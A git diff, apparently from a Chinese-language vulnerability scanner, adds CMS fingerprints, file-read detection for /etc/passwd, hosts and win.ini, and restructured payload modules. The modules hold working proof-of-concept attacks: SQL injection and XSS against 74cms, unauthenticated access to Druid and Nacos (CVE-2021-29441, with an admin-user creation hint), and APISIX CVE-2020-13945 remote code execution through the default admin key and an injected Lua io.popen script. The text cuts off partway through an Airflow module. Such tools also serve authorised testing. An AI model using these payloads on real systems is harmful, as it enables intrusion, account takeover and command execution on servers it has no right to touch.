+                    r'<a href="http://www\.jboss\.org/jbossas">JBoss Application Server</a>',
+                    r'<li><a href="http://www\.jboss\.org/jbossas/docs">JBoss AS Documentation</a></li>',
+                    r'<li><a href="http://community\.jboss\.org/en/wiki">JBoss Wiki</a></li>',
+                    r'<li><a href="http://jira\.jboss\.org/jira/browse/JBAS">JBoss AS JIRA</a></li>',
+                    r'<li><a href="http://community\.jboss\.org/en/jbossas">JBoss Forums</a></li>',
+                    r'<li><a href="https://lists\.jboss\.org/">JBoss Mailing Lists</a></li>',
                 ]
             },
             {
@@ -634,7 +666,15 @@ def __init__(self):
                     r'十年磨一剑 - 为API开发设计的高性能框架',
                     r':\)',
                     r'ThinkPHP.*V.*',
-                    r'\d{0,3}载初心不改 - 你值得信赖的PHP框架'
+                    r'\d{0,3}载初心不改 - 你值得信赖的PHP框架',
+                    r'</sup> { Fast & Simple OOP PHP Framework } -- \[ WE CAN DO IT JUST THINK \]</p>',
+                    r'/app/ThinkPHP/Library/Think/App\.class\.php\(',
+                    r'/app/ThinkPHP/ThinkPHP\.php\(',
+                    r'Think\\App::exec\(\)',
+                    r'Think\\App::run\(\)',
+                    r'Think\\Think::start\(\)',
+                    r"require\('/app/ThinkPHP/T\.\.\.'\)",
+                    r'<p><a title="官方网站" href="http://www\.thinkphp\.cn">ThinkPHP</a><sup>',
                 ]
             },
             {
@@ -646,7 +686,15 @@ def __init__(self):
                     r'十年磨一剑 - 为API开发设计的高性能框架',
                     r':\)',
                     r'ThinkPHP.*V.*',
-                    r'\d{0,3}载初心不改 - 你值得信赖的PHP框架'
+                    r'\d{0,3}载初心不改 - 你值得信赖的PHP框架',
+                    r'</sup> { Fast & Simple OOP PHP Framework } -- \[ WE CAN DO IT JUST THINK \]</p>',
+                    r'/app/ThinkPHP/Library/Think/App\.class\.php\(',
+                    r'/app/ThinkPHP/ThinkPHP\.php\(',
+                    r'Think\\App::exec\(\)',
+                    r'Think\\App::run\(\)',
+                    r'Think\\Think::start\(\)',
+                    r"require\('/app/ThinkPHP/T\.\.\.'\)",
+                    r'<p><a title="官方网站" href="http://www\.thinkphp\.cn">ThinkPHP</a><sup>',
                 ]
             },
                         {
@@ -671,6 +719,18 @@ def __init__(self):
                     r'<button onclick=" UE\.getEditor(\'editor\')\.setHide()">隐藏编辑器</button>'
                 ]
             },
+            {
+                'name': 'vmware',
+                'path': '',
+                'data': '',
+                'fingerprint': [
+                    r'<meta name="description" content="VMware vSphere is virtual infrastructure software for partitioning, consolidating and managing systems in mission-critical environments',
+                    r'ESX Server provides a highly scalable platform with advanced resource management capabilities, which can be managed by vSphere',
+                    r'<div id="header"><img src="\./header-logo\.png" width="586" height="42" alt="VMware vSphere 6" /></div>',
+                    r'<p><a href="http://www\.vmware\.com/info\?id=1320"><script type="text/javascript">document\.write(ID_DownloadDoc);</script></a></p>',
+                    r'<p><script type="text/javascript">document\.write(\'<a href="http://www\.vmware\.com/info\?id=928">\'\+ ID_DownloadSDK \+\'</a>\');</script></p>',
+                ]
+            },
             {
                 'name': 'weblogic',
                 'path': '',
diff --git a/lib/plugins/shell.py b/lib/plugins/shell.py
index b74942e..304b92c 100644
--- a/lib/plugins/shell.py
+++ b/lib/plugins/shell.py
@@ -57,6 +57,10 @@ def __init__(self):
                 'System32(\\|%5c|%5C)?'\
                 'drivers(\\|%5c|%5C)?'\
                     'etc(\\|%5c|%5C)?hosts',
+            r'C:(/|%2f|%2F)?'\
+                    'Windows(/|%2f|%2F)?win.ini',
+            r'C:(\\|%5c|%5C)?'\
+                    'Windows(\\|%5c|%5C)?win.ini',
         ]
         
         self.ssrf_old_payload_re_list = [
diff --git a/lib/tool/check.py b/lib/tool/check.py
index 6ca1c31..6f782f4 100644
--- a/lib/tool/check.py
+++ b/lib/tool/check.py
@@ -4,10 +4,11 @@
 '''
     检查
         无法连接至目标url
-        连接目标url超时
+            连接目标url超时
         检查poc误报
             例如直接输出payload在页面中的情况
             参考: https://github.com/zhzyker/vulmap/blob/main/core/verify.py
+        检查文件读取漏洞
 '''
 
 from lib.initial.config import config
@@ -46,26 +47,29 @@ def check_res(resText, md, command='echo'):
 
 def check_res_fileread(resText, resHeaders=None):
     ''' 检查回显, 判断是否存在 FileRead(任意文件读取) 漏洞
-        :param resText: 响应文本Response.text
-        :param resHeaders(可选参数): 响应头, 有时候回显可能在 响应Headers 里 而不在 响应Body 里
-        
+        :param resText: 要检测的响应内容
+        :param resHeaders(可选参数): 要检测的响应头
+
         * /etc/passwd
             r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root'
         * C:/Windows/System32/drivers/etc/hosts
             'Microsoft Corp' and 'Microsoft TCP/IP for Windows'
+        * C:/Windows/win.ini
+            '; for 16-bit app support
     '''
 
-    if (
+    if ( # * 检查响应Body
         re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', resText, re.I|re.M|re.S)
-        or (('Microsoft Corp' in resText) 
-            and ('Microsoft TCP/IP for Windows' in resText))
+        or (('Microsoft Corp' in resText) and ('Microsoft TCP/IP for Windows' in resText))
+        or ('; for 16-bit app support' in resText)
     ):
-        return True         # * 文件回显在 响应Body里, 存在FileRead漏洞
-    elif (
+        return True
+
+    elif ( # * 检查响应Headers
         re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', str(resHeaders), re.I|re.M|re.S)
-        or (('Microsoft Corp' in str(resHeaders)) 
-            and ('Microsoft TCP/IP for Windows' in str(resHeaders)))
+        or (('Microsoft Corp' in str(resHeaders)) and ('Microsoft TCP/IP for Windows' in str(resHeaders)))
+        or ('; for 16-bit app support' in str(resHeaders))
     ):
-        return True         # * 文件回显在 响应Headers里, 存在FileRead漏洞
-    
+        return True
+
     return False            # * 没有找到文件回显, 不存在FileRead漏洞
diff --git a/lib/tool/color.py b/lib/tool/color.py
index ea36260..c8a80ea 100644
--- a/lib/tool/color.py
+++ b/lib/tool/color.py
@@ -5,37 +5,37 @@
 
 init()                                 # * 初始化, 使Windows机器也能正常显示颜色
 
-def reset(s):
+def reset(s = ''):
     return Fore.RESET + s
 
-def red(s):                            # * 红色
+def red(s = ''):                            # * 红色
     return Fore.RED + s
 
-def green(s):                          # * 绿色
+def green(s = ''):                          # * 绿色
     return Fore.GREEN + s
 
-def cyan(s):                           # * 青蓝
+def cyan(s = ''):                           # * 青蓝
     return Fore.CYAN + s
 
-def black_ex(s):                       # * 黑色(高亮)
+def black_ex(s = ''):                       # * 黑色(高亮)
     return Fore.LIGHTBLACK_EX + s
 
-def red_ex(s):                         # * 红色(高亮)
+def red_ex(s = ''):                         # * 红色(高亮)
     return Fore.LIGHTRED_EX + s
 
-def green_ex(s):                       # * 绿色(高亮)
+def green_ex(s = ''):                       # * 绿色(高亮)
     return Fore.LIGHTGREEN_EX + s
 
-def yellow_ex(s):                      # * 黄色(高亮)
+def yellow_ex(s = ''):                      # * 黄色(高亮)
     return Fore.LIGHTYELLOW_EX + s
 
-def blue_ex(s):                        # * 蓝色(高亮)
+def blue_ex(s = ''):                        # * 蓝色(高亮)
     return Fore.LIGHTBLUE_EX + s
 
-def magenta_ex(s):                     # * 紫色(高亮)
+def magenta_ex(s = ''):                     # * 紫色(高亮)
     return Fore.LIGHTMAGENTA_EX + s
 
-def cyan_ex(s):                        # * 青蓝(高亮)
+def cyan_ex(s = ''):                        # * 青蓝(高亮)
     return Fore.LIGHTCYAN_EX + s
 
 
diff --git a/payloads/74cms/74cms-v5.0.1-sqlinject.py b/payloads/74cms/74cms-v5.0.1-sqlinject.py
new file mode 100644
index 0000000..468efa6
--- /dev/null
+++ b/payloads/74cms/74cms-v5.0.1-sqlinject.py
@@ -0,0 +1,59 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入
+    暂无编号
+        Payload: https://github.com/chaitin/xray/blob/master/pocs/74cms-sqli.yml
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool.md5 import md5, random_int_1
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5({RANNUM}))) -- a'},
+            {'path': 'upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5({RANNUM}))) -- a'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': '74cms',
+            'vul_type': 'SQLinject',
+            'vul_id': '74cms-v5.0.1-sqlinject',
+        }
+        
+        for payload in self.payloads:
+            randomNum = random_int_1(6)                # * 随机6位数字
+            
+            path = payload['path'].format(RANNUM=randomNum)
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+            
+            md = md5(str(randomNum), 31)    # * 计算随机数字的md5值, 取31位(0-30)
+
+            if (md in res.text):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+    
\ No newline at end of file
diff --git a/payloads/74cms/74cms-v6.0.4-xss.py b/payloads/74cms/74cms-v6.0.4-xss.py
new file mode 100644
index 0000000..cd8ccbc
--- /dev/null
+++ b/payloads/74cms/74cms-v6.0.4-xss.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+74CMS-v6.0.4版本 帮助中心搜索框处存在XSS
+    暂无编号
+        Payload: https://www.freebuf.com/vuls/284537.html
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool.md5 import random_int_1
+
+randomNum = random_int_1(6)
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'index.php?m=&c=help&a=help_list&key=1%253csvg/onload%253dconfirm%2528{TEXT}%2529%253E2&__hash__=1'},
+            {'path': 'index.php?m=&c=help&a=help_list&key=137244gq1lw%253csvg/onload%253dconfirm%2528{TEXT}%2529%253Edutvxlqd4lq&__hash__=d7aa5a382f14d270c3ac4de8392b4e1d_a34adb2b339972672eb447276f69ee88'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': '74cms',
+            'vul_type': 'XSS',
+            'vul_id': '74cms-v6.0.4-xss',
+        }
+        
+        for payload in self.payloads:
+            path = payload['path'].format(TEXT=randomNum)
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            md = '<svg/onload=confirm(' + str(randomNum) + ')>'
+
+            if (md in res.text):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/AlibabaDruid/alibaba-druid-unauth.py b/payloads/AlibabaDruid/alibaba-druid-unauth.py
new file mode 100644
index 0000000..71ddfc0
--- /dev/null
+++ b/payloads/AlibabaDruid/alibaba-druid-unauth.py
@@ -0,0 +1,71 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+druid未授权访问漏洞
+    攻击者可利用druid管理面板, 查看Session信息, 并利用泄露的Session登录后台(有时候可能没有Session)
+        暂无编号
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': ''},
+            {'path': 'druid/index.html'},
+            {'path': 'druid/api.html'},
+            {'path': 'index.html'},
+            {'path': 'api.html'},
+            # {'path': 'druid/datasource.html'},
+            # {'path': 'druid/sql.html'},
+            # {'path': 'druid/wall.html'},
+            # {'path': 'druid/basic.json'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')                       # * Requests Client
+        
+        vul_info = {
+            'app_name': 'AlibabaDruid',
+            'vul_type': 'unAuthorized',
+            'vul_id': 'alibaba-druid-unauth',
+        }
+
+        for payload in self.payloads:                    # * Payload
+            path = payload['path']                              # * Path
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (
+                (('Druid Stat Index' in res.text)
+                    and ('druid.index' in res.text))
+                or (('<title>Druid Stat JSON API</title>' in res.text) 
+                    and ('druid.common' in res.text))
+                # or (('<title>Druid DataSourceStat</title>' in res.text)
+                #     and ('druid.datasource' in res.text))
+                # or (('<title>Druid SQL Stat</title>' in res.text)
+                #     and ('druid.sql' in res.text))
+                # or (('<title>Druid DataSourceStat</title>' in res.text)
+                #     and ('druid.wall' in res.text))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+    
\ No newline at end of file
diff --git a/payloads/AlibabaDruid/main.py b/payloads/AlibabaDruid/main.py
deleted file mode 100644
index 7e4d1e9..0000000
--- a/payloads/AlibabaDruid/main.py
+++ /dev/null
@@ -1,27 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    AlibabaDruid扫描类: 
-        druid 未授权访问
-            暂无编号
-'''
-
-# from lib.initial.config import config
-# from lib.tool.md5 import md5
-from lib.tool.thread import thread
-from payloads.AlibabaDruid.unauth import unauth_scan
-
-class Druid():
-    def __init__(self):
-        self.app_name = 'AlibabaDruid'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=unauth_scan, clients=clients),
-        ]
-
-alidruid = Druid()
\ No newline at end of file
diff --git a/payloads/AlibabaDruid/unauth.py b/payloads/AlibabaDruid/unauth.py
deleted file mode 100644
index cf307dd..0000000
--- a/payloads/AlibabaDruid/unauth.py
+++ /dev/null
@@ -1,58 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-unauth_payloads = [
-    {'path': ''},
-    {'path': 'druid/index.html'},
-    {'path': 'druid/api.html'},
-    {'path': 'index.html'},
-    {'path': 'api.html'},
-    # {'path': 'druid/datasource.html'},
-    # {'path': 'druid/sql.html'},
-    # {'path': 'druid/wall.html'},
-    # {'path': 'druid/basic.json'},
-    
-]
-
-def unauth_scan(clients):
-    ''' druid未授权访问漏洞
-            攻击者可利用druid管理面板, 查看Session信息, 并利用泄露的Session登录后台(有时候可能没有Session)
-    '''
-    client = clients.get('reqClient')                       # * Requests Client
-    
-    vul_info = {
-        'app_name': 'AlibabaDruid',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'druid-unauth',
-    }
-
-    for payload in unauth_payloads:     # * Payload
-        path = payload['path']                              # * Path
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (
-            (('Druid Stat Index' in res.text)
-                and ('druid.index' in res.text))
-            or (('<title>Druid Stat JSON API</title>' in res.text) 
-                and ('druid.common' in res.text))
-            # or (('<title>Druid DataSourceStat</title>' in res.text)
-            #     and ('druid.datasource' in res.text))
-            # or (('<title>Druid SQL Stat</title>' in res.text)
-            #     and ('druid.sql' in res.text))
-            # or (('<title>Druid DataSourceStat</title>' in res.text)
-            #     and ('druid.wall' in res.text))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/AlibabaNacos/alibaba-nacos-cve-2021-29441-unauth.py b/payloads/AlibabaNacos/alibaba-nacos-cve-2021-29441-unauth.py
new file mode 100644
index 0000000..f0c877a
--- /dev/null
+++ b/payloads/AlibabaNacos/alibaba-nacos-cve-2021-29441-unauth.py
@@ -0,0 +1,100 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+阿里巴巴Nacos未授权访问漏洞
+    可以通过该漏洞添加nacos后台用户, 并登录nacos管理后台
+        CVE-2021-29441(nacos-4593)
+            Payload: https://github.com/alibaba/nacos/issues/4593
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'nacos/v1/auth/users?pageNo=1&pageSize=10',
+                'headers': {'User-Agent': 'Nacos-Server'}
+            },
+            {
+                'path': 'v1/auth/users?pageNo=1&pageSize=10',
+                'headers': {'User-Agent': 'Nacos-Server'}
+            },
+            {
+                'path': 'auth/users?pageNo=1&pageSize=10',
+                'headers': {'User-Agent': 'Nacos-Server'}
+            },
+            {
+                'path': 'users?pageNo=1&pageSize=10',
+                'headers': {'User-Agent': 'Nacos-Server'}
+            },
+            {
+                'path': 'nacos/v1/auth/users?pageNo=1&pageSize=10',
+                'headers': {}       # * 有时候数据包带User-Agent: Nacos-Server头时, 会被WAF拦截, 所以为空
+            },
+            {
+                'path': 'v1/auth/users?pageNo=1&pageSize=10',
+                'headers': {}       # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效
+            },
+            {
+                'path': 'auth/users?pageNo=1&pageSize=10',
+                'headers': {}       # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效
+            },
+            {
+                'path': 'users?pageNo=1&pageSize=10',
+                'headers': {}       # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效
+            }
+            # {    利用漏洞创建后台用户
+            #     'path': '/nacos/v1/auth/users?username=XXX&password=XXX',
+            #     'data': ''
+            # }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'AlibabaNacos',
+            'vul_type': 'unAuthorized',
+            'vul_id': 'CVE-2021-29441',
+        }
+
+        for payload in self.payloads:    # * Payload
+            path = payload['path']                      # * Path
+            headers = payload['headers']                # * Headers
+
+            res = client.request(
+                'get',
+                path,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (
+                ('"username":"nacos","password"' in res.text) 
+                or ('"username":"nacos", "password"' in res.text) 
+                or (('pageNumber' in res.text)
+                    and ('totalCount' in res.text)
+                    and ('pagesAvailable' in res.text)
+                    and ('pageItems' in res.text))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Exploit': {
+                        'Method': 'POST',
+                        'Path': 'nacos/v1/auth/users?username=Username&password=123456a!'
+                    },
+                    'Request': res,
+                }
+                return results
+        return None
+
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/AlibabaNacos/cve_2021_29441.py b/payloads/AlibabaNacos/cve_2021_29441.py
deleted file mode 100644
index d8a654e..0000000
--- a/payloads/AlibabaNacos/cve_2021_29441.py
+++ /dev/null
@@ -1,86 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-cve_2021_29441_payloads = [
-    {
-        'path': 'nacos/v1/auth/users?pageNo=1&pageSize=10',
-        'headers': {'User-Agent': 'Nacos-Server'}
-    },
-    {
-        'path': 'v1/auth/users?pageNo=1&pageSize=10',
-        'headers': {'User-Agent': 'Nacos-Server'}
-    },
-    {
-        'path': 'auth/users?pageNo=1&pageSize=10',
-        'headers': {'User-Agent': 'Nacos-Server'}
-    },
-    {
-        'path': 'users?pageNo=1&pageSize=10',
-        'headers': {'User-Agent': 'Nacos-Server'}
-    },
-    {
-        'path': 'nacos/v1/auth/users?pageNo=1&pageSize=10',
-        'headers': {}       # * 有时候数据包带User-Agent: Nacos-Server头时, 会被WAF拦截, 所以为空
-    },
-    {
-        'path': 'v1/auth/users?pageNo=1&pageSize=10',
-        'headers': {}       # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效
-    },
-    {
-        'path': 'auth/users?pageNo=1&pageSize=10',
-        'headers': {}       # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效
-    },
-    {
-        'path': 'users?pageNo=1&pageSize=10',
-        'headers': {}       # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效
-    }
-    # {    利用漏洞创建后台用户
-    #     'path': '/nacos/v1/auth/users?username=XXX&password=XXX',
-    #     'data': ''
-    # }
-]
-
-def cve_2021_29441_scan(clients):
-    ''' 阿里巴巴Nacos未授权访问漏洞
-            可以通过该漏洞添加nacos后台用户, 并登录nacos管理后台
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'AlibabaNacos',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'CVE-2021-29441',
-    }
-
-    for payload in cve_2021_29441_payloads:         # * Payload
-        path = payload['path']                      # * Path
-        headers = payload['headers']                # * Headers
-
-        res = client.request(
-            'get',
-            path,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (
-            ('"username":"nacos","password"' in res.text) 
-            or ('"username":"nacos", "password"' in res.text) 
-            or (('pageNumber' in res.text)
-                and ('totalCount' in res.text)
-                and ('pagesAvailable' in res.text)
-                and ('pageItems' in res.text))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Exploit': {
-                    'Method': 'POST',
-                    'Path': 'nacos/v1/auth/users?username=Username&password=123456a!'
-                },
-                'Request': res,
-            }
-            return results
-    return None
diff --git a/payloads/AlibabaNacos/main.py b/payloads/AlibabaNacos/main.py
deleted file mode 100644
index 781cd6a..0000000
--- a/payloads/AlibabaNacos/main.py
+++ /dev/null
@@ -1,26 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    AlibabaNacos扫描类: 
-        Nacos 未授权访问
-            CVE-2021-29441(nacos-4593)
-                https://github.com/alibaba/nacos/issues/4593
-'''
-
-from lib.tool.thread import thread
-from payloads.AlibabaNacos.cve_2021_29441 import cve_2021_29441_scan
-
-class Nacos():
-    def __init__(self):
-        self.app_name = 'AlibabaNacos'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2021_29441_scan, clients=clients),
-        ]
-
-nacos = Nacos()
\ No newline at end of file
diff --git a/payloads/ApacheAPISIX/apache-apisix-cve-2020-13945-unauth.py b/payloads/ApacheAPISIX/apache-apisix-cve-2020-13945-unauth.py
new file mode 100644
index 0000000..662a26a
--- /dev/null
+++ b/payloads/ApacheAPISIX/apache-apisix-cve-2020-13945-unauth.py
@@ -0,0 +1,109 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Apache APISIX默认密钥漏洞
+    在用户未指定管理员Token或使用了默认配置文件的情况下
+    Apache APISIX将使用默认的管理员Token: edd1c9f034335f136f87ad84b625c8f1
+    攻击者利用这个Token可以访问到管理员接口, 进而通过script参数来插入任意LUA脚本并执行
+        CVE-2020-13945
+            Payload: https://vulhub.org/#/environments/apisix/CVE-2020-13945/
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool.md5 import random_md5, random_int_2
+from time import sleep
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        random_path = random_md5(6)
+        payloads_data = {
+            "uri": "/" + random_path,
+            "script": "local _M = {} \n function _M.access(conf, ctx) \n local f = assert(io.popen('RCECOMMAND', 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
+            "upstream": {
+                "type": "roundrobin",
+                "nodes": {
+                    "example.com:80": 1
+                }
+            }
+        }
+
+        self.RANNUM1, self.RANNUM2 = random_int_2(6)
+        self.RCECOMMAND = f'expr {self.RANNUM1} + {self.RANNUM2}'
+
+        self.payloads = [
+            {
+                'path': 'apisix/admin/routes',
+                'data': payloads_data,
+                'path2': random_path
+            },
+            {
+                'path': 'admin/routes',
+                'data': payloads_data,
+                'path2': random_path
+            },
+            {
+                'path': 'routes',
+                'data': payloads_data,
+                'path2': random_path
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ApacheAPISIX',
+            'vul_type': 'unAuthorized',
+            'vul_id': 'CVE-2020-13945',
+        }
+        
+        headers = {
+            'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',     # * 默认密钥
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+            data['script'] = data['script'].replace('RCECOMMAND', self.RCECOMMAND)   # * 替换RCE命令
+
+            res1 = client.request(
+                'post',
+                path,
+                json=data,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+                # and ('update_time' in res1.text)
+            if ((res1.status_code == 201) and ('create_time' in res1.text)):
+                sleep(3)                # * 创建可能有延迟
+                
+                res2 = client.request(
+                    'get',
+                    payload['path2'],
+                    vul_info=vul_info
+                )
+                if res2 is None:
+                    continue
+
+                if (str(self.RANNUM1 + self.RANNUM2) in res2.text):
+                    results = {
+                        'Target': res1.request.url,
+                        'Verify': res2.request.url,
+                        'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                        'Exploit': 'https://vulhub.org/#/environments/apisix/CVE-2020-13945/',
+                        'Request-1': res1,
+                        'Request-2': res2
+                    }
+                    return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheAPISIX/cve_2020_13945.py b/payloads/ApacheAPISIX/cve_2020_13945.py
deleted file mode 100644
index a229764..0000000
--- a/payloads/ApacheAPISIX/cve_2020_13945.py
+++ /dev/null
@@ -1,96 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-from time import sleep
-
-random_path = random_md5(6)
-
-payloads_data = {
-    "uri": "/" + random_path,
-    "script": "local _M = {} \n function _M.access(conf, ctx) \n local f = assert(io.popen('RCECOMMAND', 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
-    "upstream": {
-        "type": "roundrobin",
-        "nodes": {
-            "example.com:80": 1
-        }
-    }
-}
-
-cve_2020_13945_payloads = [
-    {
-        'path': 'apisix/admin/routes',
-        'data': payloads_data,
-        'path2': random_path
-    },
-    {
-        'path': 'admin/routes',
-        'data': payloads_data,
-        'path2': random_path
-    },
-    {
-        'path': 'routes',
-        'data': payloads_data,
-        'path2': random_path
-    }
-]
-
-def cve_2020_13945_scan(clients):
-    ''' 在用户未指定管理员Token或使用了默认配置文件的情况下
-            Apache APISIX将使用默认的管理员Token: edd1c9f034335f136f87ad84b625c8f1
-            攻击者利用这个Token可以访问到管理员接口, 进而通过script参数来插入任意LUA脚本并执行
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ApacheAPISIX',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'CVE-2020-13945',
-    }
-    
-    headers = {
-        'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',     # * 默认密钥
-        'Content-Type': 'application/json'
-    }
-
-    for payload in cve_2020_13945_payloads:
-        random_num = random_md5(6)              # * 获取随机32位md5值, 取前6位
-        RCECOMMAND = 'echo ' + random_num       # * echo <md5>
-        
-        path = payload['path']
-        data = payload['data']
-        data['script'] = data['script'].replace('RCECOMMAND', RCECOMMAND)   # * 替换RCE命令
-
-        res1 = client.request(
-            'post',
-            path,
-            json=data,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-            # and ('update_time' in res1.text)
-        if ((res1.status_code == 201) and ('create_time' in res1.text)):
-            sleep(3)                # * 创建可能有延迟
-            
-            res2 = client.request(
-                'get',
-                payload['path2'],
-                vul_info=vul_info
-            )
-            if res2 is None:
-                continue
-
-            if (check.check_res(res2.text, random_num)):
-                results = {
-                    'Target': res1.request.url,
-                    'Verify': res2.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request-1': res1,
-                    'Request-2': res2
-                }
-                return results
-    return None
diff --git a/payloads/ApacheAPISIX/main.py b/payloads/ApacheAPISIX/main.py
deleted file mode 100644
index 40d7c31..0000000
--- a/payloads/ApacheAPISIX/main.py
+++ /dev/null
@@ -1,27 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Apache APISIX是一个高性能API网关
-    ApacheAPISIX扫描类: 
-        Apache APISIX默认密钥漏洞
-            CVE-2020-13945
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheAPISIX.cve_2020_13945 import cve_2020_13945_scan
-
-class APISIX():
-    def __init__(self):
-        self.app_name = 'ApacheAPISIX'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2020_13945_scan, clients=clients)
-        ]
-
-apisix = APISIX()
\ No newline at end of file
diff --git a/payloads/ApacheAirflow/apache-airflow-cve-2020-17526-unauth.py b/payloads/ApacheAirflow/apache-airflow-cve-2020-17526-unauth.py
new file mode 100644
index 0000000..19e086a
--- /dev/null
+++ b/payloads/ApacheAirflow/apache-airflow-cve-2020-17526-unauth.py
@@ -0,0 +1,116 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Airflow身份验证绕过漏洞
+    Airflow 使用默认会话密钥, 这会导致在启用身份验证时冒充任意用户
